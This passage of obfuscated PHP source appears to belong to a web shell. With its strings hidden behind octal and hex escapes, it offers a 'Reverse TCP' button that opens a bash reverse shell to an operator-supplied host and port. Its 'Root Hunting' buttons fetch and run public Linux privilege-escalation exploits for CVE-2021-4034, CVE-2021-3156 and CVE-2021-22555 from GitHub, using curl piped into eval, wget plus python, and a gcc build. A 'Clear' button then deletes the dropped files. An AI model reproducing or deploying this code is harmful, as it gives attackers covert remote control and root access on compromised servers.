"\74\x69\x6e\160\165\x74\x20\143\154\141\163\x73\75\42\143\x75\163\x74\x6f\155\55\164\x6f\x6f\x6c\163\55\142\165\164\164\157\156\163\42\40\x74\x79\160\x65\75\x22\x74\x65\x78\x74\42\40\156\x61\155\x65\x3d\42\x6e\x67\x72\x6f\153\160\x6f\162\x74\42\x20\x70\154\141\143\145\x68\x6f\x6c\x64\145\x72\75\x22\x31\x36\x35\71\x31\x22\76";echo "\74\151\156\160\x75\x74\40\x63\154\x61\163\x73\x3d\x22\x63\165\x73\164\157\x6d\55\x74\x6f\x6f\154\x73\x2d\142\x75\x74\164\157\156\163\x22\40\x74\171\x70\145\x3d\42\163\x75\x62\x6d\151\164\x22\40\156\141\x6d\145\x3d\x22\x67\x61\x73\x72\145\x76\x65\162\163\x65\x22\40\166\x61\154\x75\145\75\42\x52\x65\166\x65\x72\163\145\40\x54\x43\120\42\76";echo "\74\57\164\x72\76\74\x2f\164\x64\76";echo "\74\57\164\x62\157\x64\171\76";echo "\x3c\x2f\164\x61\x62\154\145\x3e";echo "\x3c\57\146\157\162\x6d\76";echo "\x3c\144\151\166\40\x73\x74\171\x6c\145\x3d\x22\x6d\141\x72\x67\x69\x6e\x3a\x33\60\x70\x78\40\x32\x30\160\x78\x3b\42\x3e";if(isset($_POST["\x67\x61\163\x72\145\166\x65\162\163\x65"])){set_time_limit(0);$result_reversetcp='';$VERSION="\x31\x2e\60";$ip=$_POST["\x6e\147\162\157\153\x69\160"];$port=$_POST["\156\x67\x72\157\153\x70\157\x72\x74"];$phpreverse="\57\x62\151\x6e\57\x62\x61\x73\x68\40\x2d\143\40\47\142\x61\x73\150\40\x2d\151\40\x3e\x26\x20\x2f\144\145\x76\x2f\x74\x63\160\x2f".$ip."\57{$port}\40\60\x3e\46\61\x27";$result_reversetcp.="\x3c\160\162\x65\40\x63\154\x61\x73\163\x3d\x6d\x6c\x31\76{$asciifnc7}".ex($phpreverse)."\x3c\x2f\160\x72\x65\76\x3c\142\x72\x3e";echo "\x3c\144\151\x76\x20\143\x6c\x61\163\163\75\x22\163\155\x61\x6c\154\x61\x72\x65\141\x22\40\x6e\x61\x6d\x65\x3d\x22\x6f\x75\x74\160\165\164\x20\163\164\x79\x6c\145\75\x22\142\x6f\x72\144\145\162\x2d\142\x6f\x74\164\x6f\x6d\72\60\x3b\x6d\x61\x72\147\x69\x6e\x2d\164\157\160\x3a\x35\x70\170\x3b\x22\x20\162\x65\141\x64\x6f\156\154\171\76";print_r($result_reversetcp).PHP_EOL;echo "\74\x2f\x64\x69\x76\76";}echo "\x3c\57\144\x69\x76\76";echo "\74\x2f\x64\151\166\76";die;}goto WwD7E;biG74:ini_set("\x64\151\x73\160\x6c\141\171\x5f\x73\x74\141\x72\x74\165\x70\137\x65\162\x72\x6f\162\163",0);goto bHwz9;ei2I9:if(isset($_POST["\143"])){@chdir($_POST["\143"]);}goto wRb2p;bHwz9:ini_set("\155\141\170\137\x65\x78\145\x63\165\164\151\x6f\x6e\137\x74\151\155\x65",0);goto ssGFZ;QAY2s:if(isset($_REQUEST["\141\x75\164\x6f\x72"])){echo "\74\163\164\x79\x6c\x65\x3e\x62\x6f\144\x79\x7b\142\141\143\x6b\x67\x72\157\165\156\144\x2d\x63\x6f\154\x6f\x72\x3a\43\x30\66\60\x61\x31\60\73\143\157\154\x6f\162\72\43\x65\x31\x65\x31\145\61\x3b\155\x61\162\x67\x69\156\72\x30\x3b\146\x6f\156\164\72\156\157\x72\x6d\x61\154\x20\67\x35\x25\40\101\162\151\x61\154\x2c\110\x65\x6c\166\x65\164\151\143\141\54\163\141\156\x73\x2d\x73\145\x72\151\146\x7d\143\x61\156\x76\141\163\173\x64\151\x73\x70\x6c\141\171\72\142\154\157\143\153\x3b\x76\x65\162\164\151\143\x61\154\55\x61\x6c\151\x67\156\72\142\x6f\x74\164\x6f\155\x7d\x23\x70\141\x72\164\x69\x63\154\145\163\x2d\x6a\163\x7b\167\151\x64\164\x68\72\x31\60\x30\45\73\x68\x65\151\x67\150\164\x3a\x31\x30\x30\x70\170\x3b\x62\141\x63\x6b\147\x72\x6f\x75\156\144\x2d\143\157\x6c\157\162\x3a\x23\60\x36\60\x61\x31\x30\73\142\x61\143\153\147\162\157\165\156\144\x2d\151\x6d\x61\147\x65\x3a\165\162\x6c\50\x22\x22\x29\73\x62\141\x63\153\147\x72\x6f\x75\x6e\144\x2d\x72\x65\160\x65\141\164\x3a\156\157\x2d\162\145\x70\145\141\x74\73\142\x61\x63\x6b\x67\x72\157\165\x6e\x64\x2d\163\x69\x7a\x65\x3a\143\x6f\x76\145\x72\73\142\x61\x63\153\x67\162\x6f\x75\x6e\144\x2d\x70\157\163\x69\164\x69\157\156\x3a\65\x30\45\x20\65\x30\45\175\142\157\144\171\x2c\x74\x64\54\x74\x68\x7b\x66\x6f\x6e\x74\x3a\x31\60\x70\x74\x20\x74\141\x68\157\x6d\141\x2c\x61\x72\x69\141\x6c\54\x76\x65\162\x64\x61\x6e\141\54\163\x61\x6e\x73\x2d\x73\x65\162\151\146\54\x4c\165\x63\x69\x64\141\x20\123\x61\x6e\x73\x3b\155\x61\x72\x67\151\x6e\x3a\60\73\166\145\162\164\151\x63\x61\x6c\55\x61\154\x69\147\156\x3a\164\x6f\160\x7d\x74\x61\142\x6c\x65\56\151\x6e\146\x6f\x7b\x63\157\154\157\162\x3a\43\x63\63\143\x33\x63\63\175\x74\x61\142\x6c\145\43\164\x6f\x6f\x6c\163\124\x62\154\x7b\x62\141\x63\153\x67\x72\x6f\165\x6e\x64\x2d\x63\x6f\x6c\x6f\x72\x3a\x23\60\66\x30\x61\x31\x30\x7d\141\54\150\x31\x2c\x73\x70\x61\x6e\x7b\143\x6f\154\x6f\162\x3a\43\146\146\146\x21\x69\155\x70\x6f\162\164\141\x6e\164\175\163\x70\141\x6e\x7b\146\157\156\x74\x2d\167\145\151\147\150\164\72\142\157\154\144\145\x72\x7d\x68\x31\x7b\x62\157\162\x64\145\x72\x2d\x6c\145\146\x74\x3a\x35\x70\x78\x20\163\157\154\x69\144\40\x23\71\143\x39\70\62\x65\73\160\x61\x64\144\x69\156\x67\72\62\160\170\x20\x35\x70\170\x3b\146\157\156\164\x3a\61\64\x70\x74\x20\x56\x65\x72\144\x61\156\141\x3b\142\141\x63\153\x67\x72\157\x75\156\144\55\x63\157\x6c\x6f\162\x3a\x23\61\60\x31\x35\x31\143\x3b\155\x61\x72\147\x69\x6e\72\x30\x7d\144\x69\x76\56\x63\157\x6e\x74\145\156\164\173\160\141\144\144\x69\156\x67\72\65\x70\170\73\x6d\x61\162\x67\x69\x6e\x2d\154\145\x66\x74\72\65\x70\170\x3b\x62\x61\x63\x6b\x67\162\157\x75\x6e\x64\55\x63\157\154\157\162\x3a\x23\60\66\60\x61\61\x30\175\141\x7b\164\x65\x78\164\x2d\x64\145\x63\157\162\141\164\151\157\x6e\x3a\156\157\156\x65\x7d\x61\72\x68\157\x76\x65\162\x7b\x74\x65\170\x74\55\144\145\143\x6f\x72\x61\x74\151\x6f\x6e\72\165\x6e\x64\x65\162\154\151\156\145\x3b\x63\157\x6c\157\162\72\x23\x66\x66\x64\142\65\146\x21\151\155\160\157\162\x74\141\x6e\x74\x7d\x2e\x74\x6f\x6f\x6c\x74\151\x70\72\x3a\x61\146\164\x65\x72\x7b\x62\x61\143\x6b\x67\162\157\165\156\144\x3a\x23\60\x36\x36\x33\144\x35\73\143\x6f\x6c\x6f\x72\72\x23\x66\x66\x66\73\x63\157\156\164\145\156\x74\72\x61\164\x74\x72\x28\x64\x61\164\141\55\x74\x6f\157\154\x74\x69\160\x29\x3b\x6d\141\162\147\151\x6e\x2d\164\x6f\x70\72\55\x35\60\x70\x78\x3b\x64\x69\163\160\154\141\x79\72\x62\154\157\x63\x6b\73\x70\141\144\x64\x69\x6e\x67\72\66\160\170\40\61\x30\160\170\x3b\160\157\163\x69\x74\x69\157\156\72\x61\142\163\x6f\154\x75\164\145\73\166\x69\x73\x69\142\151\154\x69\x74\x79\72\150\151\144\144\145\156\175\x2e\x74\x6f\x6f\154\164\x69\160\72\x68\157\166\x65\162\x3a\x3a\141\146\164\145\x72\173\x6f\160\141\x63\x69\x74\x79\x3a\61\73\x76\151\163\151\142\151\x6c\151\164\171\x3a\x76\x69\163\x69\x62\154\x65\x7d\56\155\154\61\173\x62\x6f\162\x64\145\x72\x3a\x31\160\170\x20\x73\x6f\154\x69\144\40\x23\62\60\x32\70\63\62\73\x70\x61\x64\x64\151\156\x67\72\x35\160\x78\73\155\x61\162\147\x69\x6e\x3a\x30\x3b\x6f\x76\x65\x72\x66\154\157\x77\x3a\141\165\164\157\x7d\x2e\142\x69\x67\x61\162\x65\x61\x7b\155\151\x6e\55\167\151\x64\x74\x68\x3a\x31\60\60\x25\x3b\155\x61\x78\x2d\x77\x69\144\164\x68\x3a\61\x30\x30\45\x3b\150\145\151\x67\150\x74\72\x34\x30\x30\x70\x78\175\x2e\163\x6d\x61\x6c\154\173\x6d\x69\x6e\x2d\x77\x69\144\164\x68\72\x31\60\x30\x25\73\x6d\x61\170\x2d\x77\x69\144\x74\x68\x3a\61\60\x30\x25\x3b\x68\145\x69\147\150\x74\72\61\x30\60\160\170\175\151\156\160\165\x74\54\x73\145\154\x65\x63\164\54\x74\x65\170\x74\141\x72\x65\141\x7b\155\x61\x72\147\151\156\x3a\60\x3b\143\157\x6c\x6f\x72\72\x23\146\x66\x66\x3b\x62\141\143\x6b\x67\162\157\x75\x6e\x64\55\143\157\x6c\157\x72\72\43\x32\x30\62\x38\63\x32\73\142\157\x72\144\x65\162\x3a\x6e\x6f\156\x65\x3b\x66\x6f\156\164\72\71\x70\164\x20\x43\x6f\165\x72\x69\145\x72\40\116\145\x77\73\x6f\x75\x74\154\x69\x6e\x65\72\60\175\x6c\x61\x62\145\x6c\173\160\x6f\163\151\x74\x69\x6f\156\72\162\x65\x6c\x61\164\151\x76\x65\x7d\154\x61\x62\145\154\x3a\x61\146\x74\x65\162\x7b\x63\157\156\164\x65\x6e\164\72\42\x3c\x3e\42\x3b\146\x6f\156\x74\72\x31\60\160\170\40\103\x6f\x6e\163\157\x6c\141\x73\x2c\155\157\x6e\157\163\x70\x61\x63\145\x3b\143\x6f\154\x6f\162\72\43\146\x66\146\x3b\x2d\x77\x65\x62\153\x69\164\55\x74\x72\x61\x6e\x73\146\157\162\x6d\72\x72\x6f\x74\141\x74\145\50\71\x30\x64\x65\x67\x29\73\55\155\x6f\172\x2d\x74\162\x61\156\x73\x66\157\x72\155\72\162\x6f\164\141\x74\145\x28\x39\60\x64\x65\x67\51\x3b\55\155\x73\55\x74\x72\141\x6e\163\146\157\x72\x6d\72\162\157\164\141\x74\x65\50\x39\x30\144\x65\x67\51\73\164\x72\x61\156\163\146\157\162\155\72\162\157\x74\141\164\145\x28\x39\60\144\x65\147\51\x3b\x72\x69\x67\150\x74\72\63\x70\x78\x3b\164\157\x70\x3a\x33\x70\x78\73\160\141\144\x64\x69\x6e\147\72\60\x3b\x70\157\163\151\164\x69\x6f\156\x3a\x61\142\x73\157\x6c\x75\x74\x65\73\160\x6f\x69\x6e\x74\x65\162\55\145\x76\145\x6e\x74\x73\x3a\156\x6f\x6e\145\x7d\154\141\142\145\154\72\142\x65\146\x6f\x72\145\173\143\157\156\164\x65\x6e\164\72\42\x22\x3b\162\151\x67\x68\x74\x3a\x30\73\x74\157\160\x3a\x30\73\167\151\x64\x74\x68\72\x31\67\x70\x78\x3b\x68\145\151\x67\150\164\x3a\61\67\x70\170\x3b\142\x61\143\153\x67\x72\157\x75\x6e\144\72\43\x32\x30\x32\70\63\62\73\x70\x6f\163\x69\x74\x69\157\x6e\72\141\x62\163\x6f\x6c\165\164\145\x3b\x70\157\151\156\164\x65\162\55\x65\166\x65\156\164\x73\72\x6e\157\156\145\73\144\151\x73\160\154\x61\171\x3a\x62\x6c\157\x63\x6b\175\x66\157\162\155\x7b\x6d\141\162\x67\151\156\x3a\60\175\43\x74\x6f\x6f\154\x73\124\142\x6c\173\x74\x65\170\x74\55\141\154\x69\x67\x6e\x3a\143\145\x6e\x74\145\162\175\43\x66\141\x6b\173\142\x61\x63\x6b\147\162\157\x75\156\x64\x3a\60\x20\x30\x7d\43\146\x61\153\40\x74\x64\173\160\x61\x64\144\x69\156\147\72\65\x70\x78\40\x30\40\60\40\x30\x7d\x69\x66\x72\x61\155\x65\173\142\x6f\162\x64\x65\162\x3a\61\x70\170\40\163\x6f\x6c\151\144\40\43\x30\x36\60\141\x31\60\175\56\x74\x6f\x6f\x6c\x73\x49\x6e\x70\173\x77\x69\144\x74\x68\72\63\60\60\x70\170\x7d\x2e\x6d\x61\x69\x6e\40\164\150\173\164\x65\x78\x74\55\141\154\151\147\156\72\x6c\145\x66\x74\73\x62\x61\143\x6b\x67\x72\157\x75\156\x64\x2d\x63\157\x6c\157\162\72\x23\60\66\x30\x61\61\x30\175\56\x6d\x61\x69\x6e\x20\164\x72\72\150\x6f\166\145\x72\173\x62\141\143\153\x67\x72\x6f\x75\x6e\x64\55\x63\157\x6c\x6f\x72\x3a\43\63\x35\64\62\65\62\x7d\x2e\155\x61\x69\156\x20\x74\144\54\x74\150\173\x76\x65\x72\x74\x69\x63\141\154\55\141\154\151\147\x6e\x3a\155\x69\144\x64\154\x65\x7d\x69\x6e\160\x75\x74\133\x74\171\160\x65\x3d\163\165\142\x6d\151\x74\135\173\142\141\143\x6b\147\162\x6f\165\x6e\x64\x2d\143\157\x6c\157\162\x3a\43\x39\143\71\70\62\145\x7d\151\x6e\160\x75\x74\133\164\171\x70\145\75\x62\x75\x74\x74\x6f\x6e\135\173\x62\x61\143\153\147\162\157\x75\x6e\144\x2d\x63\157\154\157\162\x3a\x23\x39\x63\71\x38\x32\x65\175\x69\x6e\160\165\x74\x5b\164\x79\x70\145\75\163\165\142\x6d\x69\164\135\72\150\x6f\x76\145\x72\x7b\x62\x61\143\x6b\x67\x72\x6f\x75\156\x64\x2d\143\157\154\x6f\162\x3a\43\x66\x66\144\x62\65\146\x7d\151\156\x70\165\164\x5b\x74\x79\160\145\75\x62\165\164\164\157\x6e\x5d\72\x68\x6f\x76\145\x72\x7b\142\141\x63\x6b\x67\162\157\x75\156\x64\x2d\143\x6f\154\x6f\x72\72\x23\x66\x66\x64\x62\x35\x66\175\56\154\61\173\x62\141\x63\x6b\147\162\x6f\x75\156\144\x2d\x63\x6f\154\157\x72\x3a\43\x32\x30\x32\70\63\62\x7d\x70\162\145\x7b\146\x6f\156\164\x3a\x39\x70\164\x20\x43\x6f\165\162\151\145\x72\40\x4e\x65\x77\x7d\x69\156\160\x75\164\x5b\164\171\x70\x65\x3d\x73\x75\x62\155\151\164\x5d\x2e\x63\x75\x73\x74\x6f\155\55\164\157\157\x6c\x73\55\x62\165\164\164\157\156\x73\173\x66\157\156\x74\55\x73\x69\x7a\145\72\x31\64\x70\x78\x21\x69\155\x70\157\162\164\x61\x6e\x74\x3b\160\x61\144\144\151\156\x67\72\65\x70\x78\x20\61\60\x70\170\41\151\155\160\x6f\162\x74\x61\156\164\x3b\155\x61\x72\147\x69\156\72\60\x20\65\160\x78\x21\151\x6d\160\157\x72\x74\x61\156\x74\x3b\146\157\x6e\164\55\167\x65\x69\147\x68\x74\x3a\x37\60\60\x21\151\155\160\x6f\162\164\141\x6e\164\73\x63\x75\x72\x73\157\x72\72\160\x6f\x69\x6e\x74\145\x72\x21\151\x6d\x70\x6f\162\x74\141\x6e\164\x3b\x63\157\x6c\157\x72\x3a\x23\x65\61\145\61\145\61\41\151\155\160\x6f\x72\x74\x61\x6e\164\73\x62\141\143\x6b\147\162\157\165\156\x64\55\143\x6f\x6c\x6f\x72\x3a\x23\x30\x36\x30\x61\x31\x30\41\151\155\160\x6f\x72\x74\141\156\164\x3b\x62\157\162\144\x65\162\x3a\x31\160\170\x20\163\x6f\154\x69\x64\40\43\71\x63\71\x38\x32\145\41\x69\x6d\160\157\x72\x74\141\156\x74\x7d\151\x6e\160\x75\x74\x5b\164\171\160\x65\x3d\163\165\x62\x6d\151\x74\x5d\56\143\x75\163\164\x6f\155\55\x74\x6f\157\x6c\163\x2d\x62\165\164\x74\157\x6e\x73\72\150\x6f\166\145\162\173\142\x61\x63\x6b\147\x72\x6f\165\156\144\55\143\x6f\x6c\x6f\162\x3a\43\71\143\x39\70\x32\145\41\151\155\160\x6f\162\164\141\x6e\x74\x7d\74\x2f\x73\164\x79\x6c\x65\x3e";echo "\x3c\144\x69\166\40\x73\164\171\154\145\x3d\42\155\x61\162\x67\151\156\72\63\60\160\170\x20\62\60\160\x78\73\42\x3e";echo "\x3c\x66\x6f\x72\155\x20\x6d\145\164\150\157\144\75\42\x70\157\x73\164\42\76";echo "\74\164\141\142\154\145\40\x73\x74\x79\x6c\145\75\x62\141\x63\x6b\147\x72\x6f\165\156\x64\72\43\62\61\62\x38\x33\62\41\151\155\160\157\x72\164\141\x6e\x74\73\40\x63\x6c\x61\163\x73\75\x69\156\x66\x6f\40\151\144\x3d\164\x6f\x6f\154\163\x54\x62\x6c\x20\143\145\154\154\160\141\144\144\x69\156\x67\75\63\40\143\x65\154\154\163\160\x61\x63\x69\156\147\x3d\60\40\x77\x69\x64\164\150\x3d\61\x30\60\x25\76";echo "\x3c\164\x68\x65\x61\144\x3e\74\143\145\x6e\164\x65\162\76\x3c\x68\x33\x3e\x3c\163\164\x72\157\156\x67\76\x52\157\157\164\x20\110\165\156\164\151\156\147\74\x2f\163\164\x72\x6f\x6e\147\76\x3c\57\x68\63\76\x3c\x2f\x63\145\x6e\x74\145\x72\76\x3c\57\164\150\145\141\144\x3e";echo "\74\164\x62\x6f\x64\x79\x3e";echo "\74\x74\x72\76\x3c\x74\144\76";echo "\74\x69\x6e\160\x75\164\40\143\154\141\163\163\x3d\x22\143\x75\163\x74\157\x6d\55\x74\157\157\154\163\x2d\x62\165\164\164\157\x6e\x73\x22\x20\164\171\160\145\75\x22\x73\165\x62\155\x69\164\x22\x20\156\x61\155\x65\75\42\143\150\145\x63\153\155\157\144\x75\154\145\42\40\166\141\154\165\145\75\x22\x4d\x6f\144\x75\x6c\145\163\42\x3e";echo "\x3c\x69\x6e\160\x75\x74\40\143\x6c\x61\x73\x73\75\42\x63\165\163\x74\x6f\x6d\x2d\x74\157\x6f\x6c\x73\55\142\x75\164\x74\157\156\163\42\40\x74\171\160\145\x3d\42\x73\165\142\x6d\x69\164\42\40\x6e\141\155\x65\x3d\42\x61\x75\x74\157\x72\157\157\x74\64\x30\63\64\143\42\40\x76\141\154\165\145\75\42\64\60\63\x34\x2e\143\x22\x3e";echo "\x3c\x69\x6e\x70\165\x74\40\x63\154\141\x73\x73\x3d\x22\x63\x75\163\x74\x6f\155\55\164\x6f\x6f\154\x73\55\142\165\x74\x74\x6f\x6e\x73\42\40\x74\x79\x70\145\75\x22\163\x75\x62\x6d\151\x74\x22\40\156\x61\155\145\75\42\141\x75\x74\x6f\162\157\x6f\164\64\60\x33\64\x70\x79\x22\x20\x76\141\x6c\x75\x65\x3d\42\x34\60\x33\64\x2e\x70\171\42\x3e";echo "\74\151\156\160\165\164\x20\x63\x6c\x61\163\163\x3d\42\x63\165\163\164\157\155\55\164\157\157\154\x73\55\x62\165\x74\x74\x6f\156\x73\x22\40\164\171\160\x65\x3d\x22\163\165\x62\x6d\151\x74\x22\40\156\x61\x6d\145\75\42\141\165\164\157\162\x6f\x6f\x74\x33\x31\65\x36\160\171\x22\x20\166\x61\154\x75\x65\x3d\x22\x33\x31\x35\66\56\x70\171\x22\x3e";echo "\x3c\x69\156\160\165\164\40\143\154\x61\x73\163\x3d\42\x63\x75\x73\164\x6f\155\55\164\157\x6f\x6c\x73\55\142\165\x74\164\x6f\x6e\163\x22\x20\x74\171\x70\145\75\42\x73\x75\142\155\x69\164\42\x20\x6e\141\155\x65\75\x22\141\165\x74\x6f\162\157\157\164\145\x78\x70\x6c\157\151\x74\143\x22\40\x76\141\154\x75\145\75\x22\145\170\x70\154\157\151\x74\x2e\x63\x22\76";echo "\74\x69\156\x70\x75\x74\40\x63\154\141\x73\163\x3d\42\143\165\163\164\157\x6d\x2d\x74\157\x6f\x6c\163\55\x62\x75\x74\x74\157\x6e\x73\x22\40\164\171\x70\145\75\x22\x73\x75\142\155\151\x74\42\40\x6e\x61\155\x65\75\42\143\154\x65\141\162\x72\157\157\164\151\x6e\147\x22\x20\166\x61\x6c\165\145\75\42\103\x6c\x65\141\x72\42\x3e";echo "\x3c\57\x74\x72\x3e\74\x2f\164\x64\x3e";echo "\74\x2f\164\x62\157\144\171\x3e";echo "\74\57\164\141\x62\x6c\x65\x3e";echo "\74\57\x66\157\162\155\x3e";echo "\74\x64\x69\166\x20\x73\164\x79\154\x65\x3d\42\x6d\141\162\x67\151\156\x3a\63\60\x70\170\x20\62\x30\x70\170\73\x22\76";if(isset($_POST["\143\x68\x65\x63\x6b\x6d\x6f\x64\165\154\x65"])){$makev="\x6d\x61\153\x65\x20\x2d\x2d\x76\145\162\x73\151\x6f\x6e";$gccv="\147\143\143\x20\x2d\x2d\x76\145\x72\x73\151\157\x6e";$pythonv="\x70\x79\x74\150\157\x6e\40\x2d\x2d\x76\x65\162\163\x69\x6f\156";$checkmodule_result.="\x3c\160\162\x65\40\x63\154\x61\x73\x73\x3d\155\x6c\61\x3e{$asciifnc7}".ex($makev)."\x3c\x62\162\x3e\125\x6e\x74\x75\153\x20\x4d\141\153\145\40\x56\x65\162\163\151\x6f\156\x3c\x2f\x70\x72\145\x3e\x3c\142\162\76";$checkmodule_result.="\74\x70\x72\145\40\143\x6c\141\163\163\75\x6d\x6c\x31\x3e{$asciifnc7}".ex($gccv)."\74\142\162\76\125\x6e\164\165\x6b\40\107\x43\x43\40\126\x65\x72\x73\151\157\156\74\57\160\162\145\76\74\x62\x72\x3e";$checkmodule_result.="\74\160\162\x65\x20\143\x6c\141\163\x73\x3d\x6d\x6c\x31\76{$asciifnc7}".ex($pythonv)."\x3c\142\162\76\125\x6e\164\165\153\x20\x50\x79\164\x68\157\x6e\40\126\x65\x72\163\151\x6f\156\x3c\57\160\162\x65\76\74\x62\162\x3e";echo "\74\x64\x69\166\40\x63\154\141\163\163\x3d\42\163\x6d\141\154\154\x61\x72\x65\141\x22\x20\x6e\141\x6d\145\x3d\42\x6f\165\x74\160\x75\x74\40\x73\x74\171\154\x65\75\x22\x62\157\162\144\145\162\x2d\142\157\164\164\x6f\x6d\72\60\x3b\x6d\141\x72\147\151\156\55\164\157\160\x3a\x35\160\170\73\42\x20\x72\145\x61\144\x6f\156\x6c\171\76";print_r($checkmodule_result).PHP_EOL;echo "\74\57\144\x69\166\x3e";}if(isset($_POST["\141\x75\164\x6f\162\x6f\x6f\x74\64\x30\63\64\x63"])){$result_autoroot4034c="\x3c\x70\162\x65\40\143\x6c\141\163\163\x3d\x6d\154\61\76{$asciifnc7}".ex("\143\144\x20\x2f\164\155\160\40\46\x26\x20\x65\166\141\x6c\x20\42\x24\50\x63\x75\162\x6c\40\55\x73\40\x68\164\164\160\x73\72\57\x2f\162\x61\167\x2e\147\151\x74\150\x75\142\x75\163\145\x72\x63\x6f\156\164\x65\156\164\x2e\143\157\x6d\57\142\145\162\x64\x61\166\x2f\x43\126\105\55\x32\x30\x32\61\55\x34\x30\63\64\x2f\x6d\x61\151\156\x2f\x63\166\x65\x2d\x32\x30\x32\61\55\x34\x30\x33\64\56\x73\x68\x29\42")."\74\57\160\x72\x65\76";echo "\x3c\x64\x69\166\x20\143\154\141\163\163\x3d\42\163\155\x61\154\154\141\162\145\x61\x22\40\x6e\x61\x6d\145\75\42\x6f\x75\164\160\x75\164\40\163\164\171\154\145\x3d\42\142\x6f\162\144\x65\x72\x2d\x62\x6f\164\164\x6f\x6d\72\x30\x3b\155\141\x72\x67\151\156\x2d\164\157\x70\72\65\160\170\73\42\x20\162\x65\141\144\157\156\x6c\x79\x3e";print_r($result_autoroot4034c).PHP_EOL;echo "\x3c\x2f\144\x69\166\x3e";}if(isset($_POST["\141\165\164\157\x72\157\157\x74\x34\x30\x33\64\160\171"])){$result_autoroot4034py="\74\160\x72\x65\x20\x63\x6c\141\163\163\75\155\x6c\61\x3e{$asciifnc7}".ex("\143\x64\40\57\x74\155\160\x20\x26\x26\x20\167\x67\x65\164\x20\x2d\x4f\40\141\163\x2e\160\x79\x20\x68\x74\x74\160\163\72\57\57\162\x61\167\56\x67\151\164\150\x75\142\165\x73\x65\162\x63\x6f\156\164\x65\156\164\x2e\143\157\x6d\57\152\157\x65\x61\155\x6d\157\156\144\x2f\x43\x56\x45\x2d\62\x30\62\61\55\x34\x30\x33\x34\57\155\x61\x69\156\57\x43\126\x45\55\62\x30\62\61\55\64\60\63\64\x2e\160\171\40\46\46\40\160\x79\x74\x68\157\156\x20\x61\163\x2e\x70\x79")."\x3c\x2f\x70\162\x65\76";echo "\74\144\x69\x76\x20\x63\x6c\141\163\x73\x3d\42\163\x6d\141\154\x6c\141\162\x65\x61\42\x20\156\x61\155\145\75\x22\157\x75\164\160\x75\x74\40\x73\164\171\154\x65\x3d\42\142\157\162\144\145\x72\x2d\x62\157\x74\x74\157\155\x3a\x30\x3b\155\141\x72\147\151\156\55\x74\157\x70\72\65\160\170\x3b\42\40\162\145\x61\144\x6f\156\x6c\171\76";print_r($result_autoroot4034py).PHP_EOL;echo "\x3c\57\x64\x69\166\76";}if(isset($_POST["\x61\x75\x74\157\162\x6f\157\x74\63\x31\65\66\x70\171"])){$result_autoroot3156py="\x3c\x70\x72\x65\x20\143\x6c\141\163\x73\75\155\x6c\x31\76{$asciifnc7}".ex("\x63\144\40\57\164\x6d\160\40\46\x26\x20\167\x67\145\164\x20\55\117\x20\141\163\167\x2e\160\x79\40\x68\164\x74\x70\163\x3a\x2f\x2f\162\141\167\56\147\x69\x74\x68\165\142\165\x73\145\x72\x63\157\x6e\x74\145\x6e\x74\x2e\143\157\155\x2f\167\x6f\162\x61\167\x69\x74\57\x43\126\x45\x2d\x32\x30\x32\x31\55\x33\x31\x35\66\57\155\141\x69\156\x2f\145\170\x70\x6c\x6f\x69\164\x5f\x75\163\145\x72\x73\160\x65\143\56\x70\x79\x20\x26\x26\x20\160\x79\164\x68\x6f\156\x20\141\x73\x77\x2e\x70\171")."\x3c\57\160\162\145\x3e";echo "\74\144\151\166\x20\143\x6c\141\163\x73\x3d\x22\163\x6d\x61\x6c\x6c\x61\x72\x65\x61\42\x20\156\141\155\x65\x3d\42\x6f\165\x74\x70\x75\164\x20\163\164\171\154\145\75\x22\142\157\x72\144\x65\162\55\x62\x6f\x74\x74\x6f\155\x3a\60\73\x6d\x61\x72\147\151\156\x2d\x74\x6f\x70\72\x35\160\x78\73\x22\x20\162\x65\141\x64\x6f\x6e\x6c\x79\x3e";print_r($result_autoroot3156py).PHP_EOL;echo "\x3c\57\x64\151\166\76";}if(isset($_POST["\141\x75\164\157\x72\157\x6f\164\145\x78\160\154\157\x69\164\x63"])){$result_autorootexploitc="\74\x70\162\x65\40\143\x6c\141\x73\163\75\155\154\x31\x3e{$asciifnc7}".ex("\x63\144\x20\57\x74\155\x70\x20\46\x26\x20\x77\147\145\164\x20\x2d\x4f\40\x65\170\x70\x6c\x6f\x69\x74\x2e\x63\40\x68\x74\164\x70\163\72\x2f\x2f\x72\141\x77\56\147\151\x74\150\165\142\x75\163\145\x72\x63\x6f\x6e\x74\x65\x6e\x74\56\x63\157\x6d\x2f\x67\157\157\x67\x6c\145\x2f\163\x65\143\x75\x72\151\164\171\x2d\x72\x65\163\145\141\x72\143\x68\x2f\155\x61\163\164\x65\x72\57\x70\x6f\143\x73\x2f\x6c\x69\x6e\165\170\x2f\143\x76\145\55\x32\60\x32\61\55\x32\x32\65\x35\x35\x2f\145\170\160\154\157\151\x74\56\143\40\x26\46\40\x67\x63\143\x20\x2d\155\x33\62\x20\55\x73\x74\x61\164\x69\x63\40\55\157\40\x65\x78\160\x6c\x6f\x69\164\40\145\170\x70\x6c\157\x69\164\56\143\40\x26\46\40\143\150\x6d\x6f\x64\x20\x2b\170\x20\145\170\x70\154\x6f\151\164\40\46\46\56\x2f\x65\x78\x70\x6c\x6f\x69\x74")."\x3c\x2f\160\162\x65\76";echo "\x3c\x64\x69\x76\40\x63\x6c\x61\163\163\x3d\42\163\155\x61\x6c\x6c\x61\x72\x65\141\42\40\x6e\141\155\145\75\x22\157\x75\x74\160\x75\x74\40\x73\164\x79\154\x65\x3d\x22\142\x6f\162\144\145\x72\x2d\142\157\x74\x74\x6f\x6d\72\60\73\x6d\x61\x72\x67\x69\x6e\x2d\x74\x6f\160\72\65\160\170\x3b\42\x20\x72\x65\141\144\157\x6e\x6c\171\x3e";print_r($result_autorootexploitc).PHP_EOL;echo "\74\57\144\x69\166\76";}if(isset($_POST["\143\154\x65\141\x72\x72\157\x6f\x74\151\x6e\147"])){$result_clearrooting="\x3c\160\x72\145\40\x63\x6c\141\x73\x73\75\155\154\x31\76{$asciifnc7}".ex("\x63\x64\40\x2f\164\x6d\x70\x20\x26\46\x20\162\x6d\x20\55\x72\x66\x20\x61\x73\56\x70\x79\40\141\163\x77\x2e\160\x79\x20\x65\170\160\x6c\x6f\x69\164\x2e\x63\x20\145\x78\160\154\157\151\x74\x20\115\x61\x6b\145\x66\x69\x6c\145\x20\143\166\145\x2d\62\60\62\61\x2d\x34\x30\63\x34\x2e\143\x20\143\x76\x65\x2d\62\60\62\61\x2d\64\x30\63\x34\56\163\x68\x20\x70\x77\156\x6b\x69\x74\x2e\x63\x20\143\x76\145\55\x32\60\x32\x31\x2d\x34\x30\x33\64\x20\x47\103\117\x4e\x56\137\x50\101\x54\110\75\x2e\x20\160\167\156\x6b\x69\164\56\163\157\x20\160\167